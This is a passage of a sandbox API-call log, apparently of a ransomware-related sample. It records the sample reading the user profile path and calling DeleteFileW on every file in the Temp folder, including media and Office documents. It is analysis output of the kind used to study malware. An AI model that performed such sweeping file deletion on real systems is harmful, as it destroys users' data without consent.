hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.351] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.351] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0200.351] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.351] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0200.351] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.351] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.351] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.351] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.351] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0200.351] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0200.351] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0200.351] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0200.351] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0200.351] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.351] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0200.351] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0200.351] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0200.351] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0200.351] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0200.351] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0200.351] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0200.351] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0200.352] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0200.352] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0200.352] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0200.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7140, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0200.352] CryptReleaseContext (hProv=0xa7bef0, dwFlags=0x0) returned 1 [0200.352] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.352] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0200.352] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0200.352] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0200.352] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0200.352] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0200.352] FreeLibrary (hLibModule=0x76390000) returned 1 [0200.352] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.352] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.352] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.352] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.352] CloseHandle (hObject=0x4ec) returned 1 [0200.354] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.354] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0200.354] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.354] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0200.354] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Temp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", lpFilePart=0x8cedf4*="Temp") returned 0x22 [0200.354] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp")) returned 0x10 [0200.354] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2e540d50, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2e540d50, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e1db8 [0200.355] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2e540d50, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2e540d50, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0200.355] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x678f6260, ftCreationTime.dwHighDateTime=0x1d5d760, ftLastAccessTime.dwLowDateTime=0x6b8411e0, ftLastAccessTime.dwHighDateTime=0x1d5ca8b, ftLastWriteTime.dwLowDateTime=0x6b8411e0, ftLastWriteTime.dwHighDateTime=0x1d5ca8b, nFileSizeHigh=0x0, nFileSizeLow=0xa8a9, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="-J8mWuTk3S0078.jpg", cAlternateFileName="-J8MWU~1.JPG")) returned 1 [0200.355] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\-J8mWuTk3S0078.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\-j8mwutk3s0078.jpg")) returned 1 [0200.355] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x786a49a0, ftCreationTime.dwHighDateTime=0x1d5d635, ftLastAccessTime.dwLowDateTime=0x542cfbb0, ftLastAccessTime.dwHighDateTime=0x1d5d774, ftLastWriteTime.dwLowDateTime=0x542cfbb0, ftLastWriteTime.dwHighDateTime=0x1d5d774, nFileSizeHigh=0x0, nFileSizeLow=0x115d7, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="0BD9D u2ViCs.mkv", cAlternateFileName="0BD9DU~1.MKV")) returned 1 [0200.355] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\0BD9D u2ViCs.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\0bd9d u2vics.mkv")) returned 1 [0200.356] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecb31850, ftCreationTime.dwHighDateTime=0x1d5c81b, ftLastAccessTime.dwLowDateTime=0x5f9adc60, ftLastAccessTime.dwHighDateTime=0x1d5d1e8, ftLastWriteTime.dwLowDateTime=0x5f9adc60, ftLastWriteTime.dwHighDateTime=0x1d5d1e8, nFileSizeHigh=0x0, nFileSizeLow=0x185a5, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="0gBW9j8Ltq9C9 cR8B.swf", cAlternateFileName="0GBW9J~1.SWF")) returned 1 [0200.356] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\0gBW9j8Ltq9C9 cR8B.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\0gbw9j8ltq9c9 cr8b.swf")) returned 1 [0200.360] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61f61590, ftCreationTime.dwHighDateTime=0x1d5cfe7, ftLastAccessTime.dwLowDateTime=0xff7fa070, ftLastAccessTime.dwHighDateTime=0x1d5d1f3, ftLastWriteTime.dwLowDateTime=0xff7fa070, ftLastWriteTime.dwHighDateTime=0x1d5d1f3, nFileSizeHigh=0x0, nFileSizeLow=0x25ee, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="0V8_XNfLim00.mp3", cAlternateFileName="0V8_XN~1.MP3")) returned 1 [0200.360] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\0V8_XNfLim00.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\0v8_xnflim00.mp3")) returned 1 [0200.360] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe756ab0, ftCreationTime.dwHighDateTime=0x1d5d749, ftLastAccessTime.dwLowDateTime=0xc7d5ca00, ftLastAccessTime.dwHighDateTime=0x1d5d775, ftLastWriteTime.dwLowDateTime=0xc7d5ca00, ftLastWriteTime.dwHighDateTime=0x1d5d775, nFileSizeHigh=0x0, nFileSizeLow=0xb08e, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="0ZaT5.mp3", cAlternateFileName="")) returned 1 [0200.360] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\0ZaT5.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\0zat5.mp3")) returned 1 [0200.361] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22834041, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x22834041, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x22834041, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x33a, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="200 dollars.txt", cAlternateFileName="200DOL~1.TXT")) returned 1 [0200.361] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\200 dollars.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\200 dollars.txt")) returned 1 [0200.363] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec549b20, ftCreationTime.dwHighDateTime=0x1d5d10f, ftLastAccessTime.dwLowDateTime=0x26fc85a0, ftLastAccessTime.dwHighDateTime=0x1d5d56e, ftLastWriteTime.dwLowDateTime=0x26fc85a0, ftLastWriteTime.dwHighDateTime=0x1d5d56e, nFileSizeHigh=0x0, nFileSizeLow=0x99c0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="3lwtNe5Lf5BvlolqmO p.wav", cAlternateFileName="3LWTNE~1.WAV")) returned 1 [0200.363] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\3lwtNe5Lf5BvlolqmO p.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\3lwtne5lf5bvlolqmo p.wav")) returned 1 [0200.369] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e83f780, ftCreationTime.dwHighDateTime=0x1d5d26b, ftLastAccessTime.dwLowDateTime=0xe244f920, ftLastAccessTime.dwHighDateTime=0x1d5c92d, ftLastWriteTime.dwLowDateTime=0xe244f920, ftLastWriteTime.dwHighDateTime=0x1d5c92d, nFileSizeHigh=0x0, nFileSizeLow=0x6607, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="5R1O7ds.flv", cAlternateFileName="")) returned 1 [0200.369] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\5R1O7ds.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\5r1o7ds.flv")) returned 1 [0200.369] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5c6d670, ftCreationTime.dwHighDateTime=0x1d5cff0, ftLastAccessTime.dwLowDateTime=0x86093150, ftLastAccessTime.dwHighDateTime=0x1d5d61e, ftLastWriteTime.dwLowDateTime=0x86093150, ftLastWriteTime.dwHighDateTime=0x1d5d61e, nFileSizeHigh=0x0, nFileSizeLow=0x8ada, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="5RYlT7RSDYrVhXrO.xlsx", cAlternateFileName="5RYLT7~1.XLS")) returned 1 [0200.369] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\5RYlT7RSDYrVhXrO.xlsx" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\5rylt7rsdyrvhxro.xlsx")) returned 1 [0200.370] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea157f60, ftCreationTime.dwHighDateTime=0x1d5d5d7, ftLastAccessTime.dwLowDateTime=0xf102a850, ftLastAccessTime.dwHighDateTime=0x1d5ca08, ftLastWriteTime.dwLowDateTime=0xf102a850, ftLastWriteTime.dwHighDateTime=0x1d5ca08, nFileSizeHigh=0x0, nFileSizeLow=0x14c95, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="6Ctry_XkDsrvEG.jpg", cAlternateFileName="6CTRY_~1.JPG")) returned 1 [0200.370] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\6Ctry_XkDsrvEG.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\6ctry_xkdsrveg.jpg")) returned 1 [0200.371] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2dc4550, ftCreationTime.dwHighDateTime=0x1d5d367, ftLastAccessTime.dwLowDateTime=0x34e6000, ftLastAccessTime.dwHighDateTime=0x1d5d2d6, ftLastWriteTime.dwLowDateTime=0x34e6000, ftLastWriteTime.dwHighDateTime=0x1d5d2d6, nFileSizeHigh=0x0, nFileSizeLow=0x1011d, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="9K9p7NCM.avi", cAlternateFileName="")) returned 1 [0200.371] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9K9p7NCM.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9k9p7ncm.avi")) returned 1 [0200.372] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe53e1b20, ftCreationTime.dwHighDateTime=0x1d5cf9f, ftLastAccessTime.dwLowDateTime=0x85b3b3e0, ftLastAccessTime.dwHighDateTime=0x1d5d495, ftLastWriteTime.dwLowDateTime=0x85b3b3e0, ftLastWriteTime.dwHighDateTime=0x1d5d495, nFileSizeHigh=0x0, nFileSizeLow=0xa988, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="B2KzIcb6hjlnpLrYGp.wav", cAlternateFileName="B2KZIC~1.WAV")) returned 1 [0200.372] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\B2KzIcb6hjlnpLrYGp.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\b2kzicb6hjlnplrygp.wav")) returned 1 [0200.372] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30b4680c, ftCreationTime.dwHighDateTime=0x1d5d815, ftLastAccessTime.dwLowDateTime=0x30b4680c, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0x30b4680c, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="bst708C.tmp", cAlternateFileName="")) returned 1 [0200.372] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\bst708C.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\bst708c.tmp")) returned 1 [0200.373] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad324ab0, ftCreationTime.dwHighDateTime=0x1d5d636, ftLastAccessTime.dwLowDateTime=0xd6d3b4e0, ftLastAccessTime.dwHighDateTime=0x1d5d3ce, ftLastWriteTime.dwLowDateTime=0xd6d3b4e0, ftLastWriteTime.dwHighDateTime=0x1d5d3ce, nFileSizeHigh=0x0, nFileSizeLow=0x5244, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="cgPglNyEK.docx", cAlternateFileName="CGPGLN~1.DOC")) returned 1 [0200.373] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\cgPglNyEK.docx" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\cgpglnyek.docx")) returned 1 [0200.373] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11adc160, ftCreationTime.dwHighDateTime=0x1d5ceb5, ftLastAccessTime.dwLowDateTime=0xb4d3c4d0, ftLastAccessTime.dwHighDateTime=0x1d5d0d0, ftLastWriteTime.dwLowDateTime=0xb4d3c4d0, ftLastWriteTime.dwHighDateTime=0x1d5d0d0, nFileSizeHigh=0x0, nFileSizeLow=0x109ed, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="ckgqbn2dzlJr5NXiNG4B.pps", cAlternateFileName="CKGQBN~1.PPS")) returned 1 [0200.373] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\ckgqbn2dzlJr5NXiNG4B.pps" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ckgqbn2dzljr5nxing4b.pps")) returned 1 [0200.374] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f7d8fe0, ftCreationTime.dwHighDateTime=0x1d5c9d7, ftLastAccessTime.dwLowDateTime=0x65e4b20, ftLastAccessTime.dwHighDateTime=0x1d5c9ee, ftLastWriteTime.dwLowDateTime=0x65e4b20, ftLastWriteTime.dwHighDateTime=0x1d5c9ee, nFileSizeHigh=0x0, nFileSizeLow=0xbdf4, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="HrSiyxV8.mp4", cAlternateFileName="")) returned 1 [0200.374] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\HrSiyxV8.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\hrsiyxv8.mp4")) returned 1 [0200.375] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8806c450, ftCreationTime.dwHighDateTime=0x1d5c79f, ftLastAccessTime.dwLowDateTime=0x4f50eaf0, ftLastAccessTime.dwHighDateTime=0x1d5cb46, ftLastWriteTime.dwLowDateTime=0x4f50eaf0, ftLastWriteTime.dwHighDateTime=0x1d5cb46, nFileSizeHigh=0x0, nFileSizeLow=0x1462c, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="iJc_8UIMgkt.pptx", cAlternateFileName="IJC_8U~1.PPT")) returned 1 [0200.375] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\iJc_8UIMgkt.pptx" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ijc_8uimgkt.pptx")) returned 1 [0200.375] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd02b5d00, ftCreationTime.dwHighDateTime=0x1d5d27f, ftLastAccessTime.dwLowDateTime=0x32cc8bf0, ftLastAccessTime.dwHighDateTime=0x1d5ca2e, ftLastWriteTime.dwLowDateTime=0x32cc8bf0, ftLastWriteTime.dwHighDateTime=0x1d5ca2e, nFileSizeHigh=0x0, nFileSizeLow=0x1262a, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="iMsip.mkv", cAlternateFileName="")) returned 1 [0200.375] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\iMsip.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\imsip.mkv")) returned 1 [0200.376] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2285a291, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x2285a291, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x22a23d30, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x8d0d8, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="kkk ransomware.exe", cAlternateFileName="KKKRAN~1.EXE")) returned 1 [0200.376] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\kkk ransomware.exe")) returned 0 [0200.377] FindClose (in: hFindFile=0x9e1db8 | out: hFindFile=0x9e1db8) returned 1 [0200.377] GetLastError () returned 0x5 [0200.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0200.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0200.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0200.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0200.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0200.378] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0200.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0200.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0200.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0200.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0200.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0200.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0200.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0200.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0200.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0200.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0200.378] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0200.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0200.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa828 [0200.378] RtlAllocateHeap 